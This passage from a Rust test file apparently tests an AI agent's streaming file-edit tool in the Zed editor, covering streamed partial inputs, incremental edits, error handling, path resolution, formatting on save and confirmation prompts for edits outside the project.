result.unwrap_err() - else { - panic!("expected error"); - }; - assert_eq!(error, "Can't edit file: path not found"); - assert!(diff.is_empty()); - assert_eq!(input_path, None); - } - - #[gpui::test] - async fn test_streaming_edit_failed_match(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello world"})).await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit file".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "nonexistent text that is not in the file".into(), - new_text: "replacement".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Error { error, .. } = result.unwrap_err() else { - panic!("expected error"); - }; - assert!( - error.contains("Could not find matching text"), - "Expected error containing 'Could not find matching text' but got: {error}" - ); - } - - #[gpui::test] - async fn test_streaming_early_buffer_open(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Send partials simulating LLM streaming: description first, then path, then mode - sender.send_partial(json!({"display_description": "Edit lines"})); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt" - })); - cx.run_until_parked(); - - // Path is NOT yet complete because mode hasn't appeared — no buffer open yet - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // Now send the final complete input - sender.send_full(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); - } - - #[gpui::test] - async fn test_streaming_path_completeness_heuristic(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello world"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Send partial with path but NO mode — path should NOT be treated as complete - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file" - })); - cx.run_until_parked(); - - // Now the path grows and mode appears - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write" - })); - cx.run_until_parked(); - - // Send final - sender.send_full(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write", - "content": "new content" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "new content"); - } - - #[gpui::test] - async fn test_streaming_cancellation_during_partials(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello world"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver, mut cancellation_tx) = - ToolCallEventStream::test_with_cancellation(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Send a partial - sender.send_partial(json!({"display_description": "Edit"})); - cx.run_until_parked(); - - // Cancel during streaming - ToolCallEventStream::signal_cancellation_with_sender(&mut cancellation_tx); - cx.run_until_parked(); - - // The sender is still alive so the partial loop should detect cancellation - // We need to drop the sender to also unblock recv() if the loop didn't catch it - drop(sender); - - let result = task.await; - let StreamingEditFileToolOutput::Error { error, .. } = result.unwrap_err() else { - panic!("expected error"); - }; - assert!( - error.contains("cancelled"), - "Expected cancellation error but got: {error}" - ); - } - - #[gpui::test] - async fn test_streaming_edit_with_multiple_partials(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), - ) - .await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Simulate fine-grained streaming of the JSON - sender.send_partial(json!({"display_description": "Edit multiple"})); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "line 1"}] - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "modified line 1"}, - {"old_text": "line 5"} - ] - })); - cx.run_until_parked(); - - // Send final complete input - sender.send_full(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "modified line 1"}, - {"old_text": "line 5", "new_text": "modified line 5"} - ] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!( - new_text, - "modified line 1\nline 2\nline 3\nline 4\nmodified line 5\n" - ); - } - - #[gpui::test] - async fn test_streaming_create_file_with_partials(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Stream partials for create mode - sender.send_partial(json!({"display_description": "Create new file"})); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write", - "content": "Hello, " - })); - cx.run_until_parked(); - - // Final with full content - sender.send_full(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write", - "content": "Hello, World!" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "Hello, World!"); - } - - #[gpui::test] - async fn test_streaming_no_partials_direct_final(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Send final immediately with no partials (simulates non-streaming path) - sender.send_full(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); - } - - #[gpui::test] - async fn test_streaming_incremental_edit_application(cx: &mut TestAppContext) { - let (tool, project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), - ) - .await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Stream description, path, mode - sender.send_partial(json!({"display_description": "Edit multiple lines"})); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // First edit starts streaming (old_text only, still in progress) - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "line 1"}] - })); - cx.run_until_parked(); - - // Buffer should not have changed yet — the first edit is still in progress - // (no second edit has appeared to prove the first is complete) - let buffer_text = project.update(cx, |project, cx| { - let project_path = project.find_project_path(&PathBuf::from("root/file.txt"), cx); - project_path.and_then(|pp| { - project - .get_open_buffer(&pp, cx) - .map(|buffer| buffer.read(cx).text()) - }) - }); - // Buffer is open (from streaming) but edit 1 is still in-progress - assert_eq!( - buffer_text.as_deref(), - Some("line 1\nline 2\nline 3\nline 4\nline 5\n"), - "Buffer should not be modified while first edit is still in progress" - ); - - // Second edit appears — this proves the first edit is complete, so it - // should be applied immediately during streaming - sender.send_partial(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "MODIFIED 1"}, - {"old_text": "line 5"} - ] - })); - cx.run_until_parked(); - - // First edit should now be applied to the buffer - let buffer_text = project.update(cx, |project, cx| { - let project_path = project.find_project_path(&PathBuf::from("root/file.txt"), cx); - project_path.and_then(|pp| { - project - .get_open_buffer(&pp, cx) - .map(|buffer| buffer.read(cx).text()) - }) - }); - assert_eq!( - buffer_text.as_deref(), - Some("MODIFIED 1\nline 2\nline 3\nline 4\nline 5\n"), - "First edit should be applied during streaming when second edit appears" - ); - - // Send final complete input - sender.send_full(json!({ - "display_description": "Edit multiple lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "MODIFIED 1"}, - {"old_text": "line 5", "new_text": "MODIFIED 5"} - ] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { - new_text, old_text, .. - } = result.unwrap() - else { - panic!("expected success"); - }; - assert_eq!(new_text, "MODIFIED 1\nline 2\nline 3\nline 4\nMODIFIED 5\n"); - assert_eq!( - *old_text, "line 1\nline 2\nline 3\nline 4\nline 5\n", - "old_text should reflect the original file content before any edits" - ); - } - - #[gpui::test] - async fn test_streaming_incremental_three_edits(cx: &mut TestAppContext) { - let (tool, project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "aaa\nbbb\nccc\nddd\neee\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Setup: description + path + mode - sender.send_partial(json!({ - "display_description": "Edit three lines", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // Edit 1 in progress - sender.send_partial(json!({ - "display_description": "Edit three lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "aaa", "new_text": "AAA"}] - })); - cx.run_until_parked(); - - // Edit 2 appears — edit 1 is now complete and should be applied - sender.send_partial(json!({ - "display_description": "Edit three lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "aaa", "new_text": "AAA"}, - {"old_text": "ccc", "new_text": "CCC"} - ] - })); - cx.run_until_parked(); - - // Verify edit 1 fully applied. Edit 2's new_text is being - // streamed: "CCC" is inserted but the old "ccc" isn't deleted - // yet (StreamingDiff::finish runs when edit 3 marks edit 2 done). - let buffer_text = project.update(cx, |project, cx| { - let pp = project - .find_project_path(&PathBuf::from("root/file.txt"), cx) - .unwrap(); - project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) - }); - assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCCccc\nddd\neee\n")); - - // Edit 3 appears — edit 2 is now complete and should be applied - sender.send_partial(json!({ - "display_description": "Edit three lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "aaa", "new_text": "AAA"}, - {"old_text": "ccc", "new_text": "CCC"}, - {"old_text": "eee", "new_text": "EEE"} - ] - })); - cx.run_until_parked(); - - // Verify edits 1 and 2 fully applied. Edit 3's new_text is being - // streamed: "EEE" is inserted but old "eee" isn't deleted yet. - let buffer_text = project.update(cx, |project, cx| { - let pp = project - .find_project_path(&PathBuf::from("root/file.txt"), cx) - .unwrap(); - project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) - }); - assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCC\nddd\nEEEeee\n")); - - // Send final - sender.send_full(json!({ - "display_description": "Edit three lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "aaa", "new_text": "AAA"}, - {"old_text": "ccc", "new_text": "CCC"}, - {"old_text": "eee", "new_text": "EEE"} - ] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "AAA\nbbb\nCCC\nddd\nEEE\n"); - } - - #[gpui::test] - async fn test_streaming_edit_failure_mid_stream(cx: &mut TestAppContext) { - let (tool, project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Setup - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // Edit 1 (valid) in progress — not yet complete (no second edit) - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "MODIFIED"} - ] - })); - cx.run_until_parked(); - - // Edit 2 appears (will fail to match) — this makes edit 1 complete. - // Edit 1 should be applied. Edit 2 is still in-progress (last edit). - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "MODIFIED"}, - {"old_text": "nonexistent text that does not appear anywhere in the file at all", "new_text": "whatever"} - ] - })); - cx.run_until_parked(); - - let buffer = project.update(cx, |project, cx| { - let pp = project - .find_project_path(&PathBuf::from("root/file.txt"), cx) - .unwrap(); - project.get_open_buffer(&pp, cx).unwrap() - }); - - // Verify edit 1 was applied - let buffer_text = buffer.read_with(cx, |buffer, _cx| buffer.text()); - assert_eq!( - buffer_text, "MODIFIED\nline 2\nline 3\n", - "First edit should be applied even though second edit will fail" - ); - - // Edit 3 appears — this makes edit 2 "complete", triggering its - // resolution which should fail (old_text doesn't exist in the file). - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "line 1", "new_text": "MODIFIED"}, - {"old_text": "nonexistent text that does not appear anywhere in the file at all", "new_text": "whatever"}, - {"old_text": "line 3", "new_text": "MODIFIED 3"} - ] - })); - cx.run_until_parked(); - - // The error from edit 2 should have propagated out of the partial loop. - // Drop sender to unblock recv() if the loop didn't catch it. - drop(sender); - - let result = task.await; - let StreamingEditFileToolOutput::Error { - error, - diff, - input_path, - } = result.unwrap_err() - else { - panic!("expected error"); - }; - - assert!( - error.contains("Could not find matching text for edit at index 1"), - "Expected error about edit 1 failing, got: {error}" - ); - // Ensure that first edit was applied successfully and that we saved the buffer - assert_eq!(input_path, Some(PathBuf::from("root/file.txt"))); - assert_eq!( - diff, - "@@ -1,3 +1,3 @@\n-line 1\n+MODIFIED\n line 2\n line 3\n" - ); - } - - #[gpui::test] - async fn test_streaming_single_edit_no_incremental(cx: &mut TestAppContext) { - let (tool, project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello world\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Setup + single edit that stays in-progress (no second edit to prove completion) - sender.send_partial(json!({ - "display_description": "Single edit", - "path": "root/file.txt", - "mode": "edit", - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Single edit", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "hello world", "new_text": "goodbye world"}] - })); - cx.run_until_parked(); - - // The edit's old_text and new_text both arrived in one partial, so - // the old_text is resolved and new_text is being streamed via - // StreamingDiff. The buffer reflects the in-progress diff (new text - // inserted, old text not yet fully removed until finalization). - let buffer_text = project.update(cx, |project, cx| { - let pp = project - .find_project_path(&PathBuf::from("root/file.txt"), cx) - .unwrap(); - project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) - }); - assert_eq!( - buffer_text.as_deref(), - Some("goodbye worldhello world\n"), - "In-progress streaming diff: new text inserted, old text not yet removed" - ); - - // Send final — the edit is applied during finalization - sender.send_full(json!({ - "display_description": "Single edit", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "hello world", "new_text": "goodbye world"}] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "goodbye world\n"); - } - - #[gpui::test] - async fn test_streaming_input_partials_then_final(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; - let (mut sender, input): (ToolInputSender, ToolInput) = - ToolInput::test(); - let (event_stream, _event_rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Send progressively more complete partial snapshots, as the LLM would - sender.send_partial(json!({ - "display_description": "Edit lines" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] - })); - cx.run_until_parked(); - - // Send the final complete input - sender.send_full(json!({ - "display_description": "Edit lines", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); - } - - #[gpui::test] - async fn test_streaming_input_sender_dropped_before_final(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello world\n"})).await; - let (mut sender, input): (ToolInputSender, ToolInput) = - ToolInput::test(); - let (event_stream, _event_rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Send a partial then drop the sender without sending final - sender.send_partial(json!({ - "display_description": "Edit file" - })); - cx.run_until_parked(); - - drop(sender); - - let result = task.await; - assert!( - result.is_err(), - "Tool should error when sender is dropped without sending final input" - ); - } - - #[gpui::test] - async fn test_streaming_input_recv_drains_partials(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; - // Create a channel and send multiple partials before a final, then use - // ToolInput::resolved-style immediate delivery to confirm recv() works - // when partials are already buffered. - let (mut sender, input): (ToolInputSender, ToolInput) = - ToolInput::test(); - let (event_stream, _event_rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Buffer several partials before sending the final - sender.send_partial(json!({"display_description": "Create"})); - sender.send_partial(json!({"display_description": "Create", "path": "root/dir/new.txt"})); - sender.send_partial(json!({ - "display_description": "Create", - "path": "root/dir/new.txt", - "mode": "write" - })); - sender.send_full(json!({ - "display_description": "Create", - "path": "root/dir/new.txt", - "mode": "write", - "content": "streamed content" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "streamed content"); - } - - #[gpui::test] - async fn test_streaming_resolve_path_for_creating_file(cx: &mut TestAppContext) { - let mode = StreamingEditFileMode::Write; - - let result = test_resolve_path(&mode, "root/new.txt", cx); - assert_resolved_path_eq(result.await, rel_path("new.txt")); - - let result = test_resolve_path(&mode, "new.txt", cx); - assert_resolved_path_eq(result.await, rel_path("new.txt")); - - let result = test_resolve_path(&mode, "dir/new.txt", cx); - assert_resolved_path_eq(result.await, rel_path("dir/new.txt")); - - let result = test_resolve_path(&mode, "root/dir/subdir/existing.txt", cx); - assert_resolved_path_eq(result.await, rel_path("dir/subdir/existing.txt")); - - let result = test_resolve_path(&mode, "root/dir/subdir", cx); - assert_eq!( - result.await.unwrap_err(), - "Can't write to file: path is a directory" - ); - - let result = test_resolve_path(&mode, "root/dir/nonexistent_dir/new.txt", cx); - assert_eq!( - result.await.unwrap_err(), - "Can't create file: parent directory doesn't exist" - ); - } - - #[gpui::test] - async fn test_streaming_resolve_path_for_editing_file(cx: &mut TestAppContext) { - let mode = StreamingEditFileMode::Edit; - - let path_with_root = "root/dir/subdir/existing.txt"; - let path_without_root = "dir/subdir/existing.txt"; - let result = test_resolve_path(&mode, path_with_root, cx); - assert_resolved_path_eq(result.await, rel_path(path_without_root)); - - let result = test_resolve_path(&mode, path_without_root, cx); - assert_resolved_path_eq(result.await, rel_path(path_without_root)); - - let result = test_resolve_path(&mode, "root/nonexistent.txt", cx); - assert_eq!(result.await.unwrap_err(), "Can't edit file: path not found"); - - let result = test_resolve_path(&mode, "root/dir", cx); - assert_eq!( - result.await.unwrap_err(), - "Can't edit file: path is a directory" - ); - } - - async fn test_resolve_path( - mode: &StreamingEditFileMode, - path: &str, - cx: &mut TestAppContext, - ) -> Result { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "dir": { - "subdir": { - "existing.txt": "hello" - } - } - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - - cx.update(|cx| resolve_path(*mode, &PathBuf::from(path), &project, cx)) - } - - #[track_caller] - fn assert_resolved_path_eq(path: Result, expected: &RelPath) { - let actual = path.expect("Should return valid path").path; - assert_eq!(actual.as_ref(), expected); - } - - #[gpui::test] - async fn test_streaming_format_on_save(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"src": {}})).await; - let (tool, project, action_log, fs, thread) = - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - - let rust_language = Arc::new(language::Language::new( - language::LanguageConfig { - name: "Rust".into(), - matcher: language::LanguageMatcher { - path_suffixes: vec!["rs".to_string()], - ..Default::default() - }, - ..Default::default() - }, - None, - )); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - language_registry.add(rust_language); - - let mut fake_language_servers = language_registry.register_fake_lsp( - "Rust", - language::FakeLspAdapter { - capabilities: lsp::ServerCapabilities { - document_formatting_provider: Some(lsp::OneOf::Left(true)), - ..Default::default() - }, - ..Default::default() - }, - ); - - fs.save( - path!("/root/src/main.rs").as_ref(), - &"initial content".into(), - language::LineEnding::Unix, - ) - .await - .unwrap(); - - // Open the buffer to trigger LSP initialization - let buffer = project - .update(cx, |project, cx| { - project.open_local_buffer(path!("/root/src/main.rs"), cx) - }) - .await - .unwrap(); - - // Register the buffer with language servers - let _handle = project.update(cx, |project, cx| { - project.register_buffer_with_language_servers(&buffer, cx) - }); - - const UNFORMATTED_CONTENT: &str = "fn main() {println!(\"Hello!\");}\ -"; - const FORMATTED_CONTENT: &str = "This file was formatted by the fake formatter in the test.\ -"; - - // Get the fake language server and set up formatting handler - let fake_language_server = fake_language_servers.next().await.unwrap(); - fake_language_server.set_request_handler::({ - |_, _| async move { - Ok(Some(vec![lsp::TextEdit { - range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(1, 0)), - new_text: FORMATTED_CONTENT.to_string(), - }])) - } - }); - - // Test with format_on_save enabled - cx.update(|cx| { - SettingsStore::update_global(cx, |store, cx| { - store.update_user_settings(cx, |settings| { - settings.project.all_languages.defaults.format_on_save = Some(FormatOnSave::On); - settings.project.all_languages.defaults.formatter = - Some(language::language_settings::FormatterList::default()); - }); - }); - }); - - // Use streaming pattern so executor can pump the LSP request/response - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_partial(json!({ - "display_description": "Create main function", - "path": "root/src/main.rs", - "mode": "write" - })); - cx.run_until_parked(); - - sender.send_full(json!({ - "display_description": "Create main function", - "path": "root/src/main.rs", - "mode": "write", - "content": UNFORMATTED_CONTENT - })); - - let result = task.await; - assert!(result.is_ok()); - - cx.executor().run_until_parked(); - - let new_content = fs.load(path!("/root/src/main.rs").as_ref()).await.unwrap(); - assert_eq!( - new_content.replace("\r\n", "\n"), - FORMATTED_CONTENT, - "Code should be formatted when format_on_save is enabled" - ); - - let stale_buffer_count = thread - .read_with(cx, |thread, _cx| thread.action_log.clone()) - .read_with(cx, |log, cx| log.stale_buffers(cx).count()); - - assert_eq!( - stale_buffer_count, 0, - "BUG: Buffer is incorrectly marked as stale after format-on-save. Found {} stale buffers.", - stale_buffer_count - ); - - // Test with format_on_save disabled - cx.update(|cx| { - SettingsStore::update_global(cx, |store, cx| { - store.update_user_settings(cx, |settings| { - settings.project.all_languages.defaults.format_on_save = - Some(FormatOnSave::Off); - }); - }); - }); - - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool2 = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - action_log.clone(), - language_registry, - )); - - let task = cx.update(|cx| tool2.run(input, event_stream, cx)); - - sender.send_partial(json!({ - "display_description": "Update main function", - "path": "root/src/main.rs", - "mode": "write" - })); - cx.run_until_parked(); - - sender.send_full(json!({ - "display_description": "Update main function", - "path": "root/src/main.rs", - "mode": "write", - "content": UNFORMATTED_CONTENT - })); - - let result = task.await; - assert!(result.is_ok()); - - cx.executor().run_until_parked(); - - let new_content = fs.load(path!("/root/src/main.rs").as_ref()).await.unwrap(); - assert_eq!( - new_content.replace("\r\n", "\n"), - UNFORMATTED_CONTENT, - "Code should not be formatted when format_on_save is disabled" - ); - } - - #[gpui::test] - async fn test_streaming_remove_trailing_whitespace(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"src": {}})).await; - fs.save( - path!("/root/src/main.rs").as_ref(), - &"initial content".into(), - language::LineEnding::Unix, - ) - .await - .unwrap(); - let (tool, project, action_log, fs, thread) = - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - let language_registry = project.read_with(cx, |p, _cx| p.languages().clone()); - - // Test with remove_trailing_whitespace_on_save enabled - cx.update(|cx| { - SettingsStore::update_global(cx, |store, cx| { - store.update_user_settings(cx, |settings| { - settings - .project - .all_languages - .defaults - .remove_trailing_whitespace_on_save = Some(true); - }); - }); - }); - - const CONTENT_WITH_TRAILING_WHITESPACE: &str = - "fn main() { \n println!(\"Hello!\"); \n}\n"; - - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Create main function".into(), - path: "root/src/main.rs".into(), - mode: StreamingEditFileMode::Write, - content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), - edits: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - assert!(result.is_ok()); - - cx.executor().run_until_parked(); - - assert_eq!( - fs.load(path!("/root/src/main.rs").as_ref()) - .await - .unwrap() - .replace("\r\n", "\n"), - "fn main() {\n println!(\"Hello!\");\n}\n", - "Trailing whitespace should be removed when remove_trailing_whitespace_on_save is enabled" - ); - - // Test with remove_trailing_whitespace_on_save disabled - cx.update(|cx| { - SettingsStore::update_global(cx, |store, cx| { - store.update_user_settings(cx, |settings| { - settings - .project - .all_languages - .defaults - .remove_trailing_whitespace_on_save = Some(false); - }); - }); - }); - - let tool2 = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - action_log.clone(), - language_registry, - )); - - let result = cx - .update(|cx| { - tool2.run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Update main function".into(), - path: "root/src/main.rs".into(), - mode: StreamingEditFileMode::Write, - content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), - edits: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - assert!(result.is_ok()); - - cx.executor().run_until_parked(); - - let final_content = fs.load(path!("/root/src/main.rs").as_ref()).await.unwrap(); - assert_eq!( - final_content.replace("\r\n", "\n"), - CONTENT_WITH_TRAILING_WHITESPACE, - "Trailing whitespace should remain when remove_trailing_whitespace_on_save is disabled" - ); - } - - #[gpui::test] - async fn test_streaming_authorize(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({})).await; - - // Test 1: Path with .zed component should require confirmation - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from(".zed/settings.json"), - "test 1", - &stream_tx, - cx, - ) - }); - - let event = stream_rx.expect_authorization().await; - assert_eq!( - event.tool_call.fields.title, - Some("test 1 (local settings)".into()) - ); - - // Test 2: Path outside project should require confirmation - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = - cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 2", &stream_tx, cx)); - - let event = stream_rx.expect_authorization().await; - assert_eq!(event.tool_call.fields.title, Some("test 2".into())); - - // Test 3: Relative path without .zed should not require confirmation - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize(&PathBuf::from("root/src/main.rs"), "test 3", &stream_tx, cx) - }) - .await - .unwrap(); - assert!(stream_rx.try_recv().is_err()); - - // Test 4: Path with .zed in the middle should require confirmation - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - 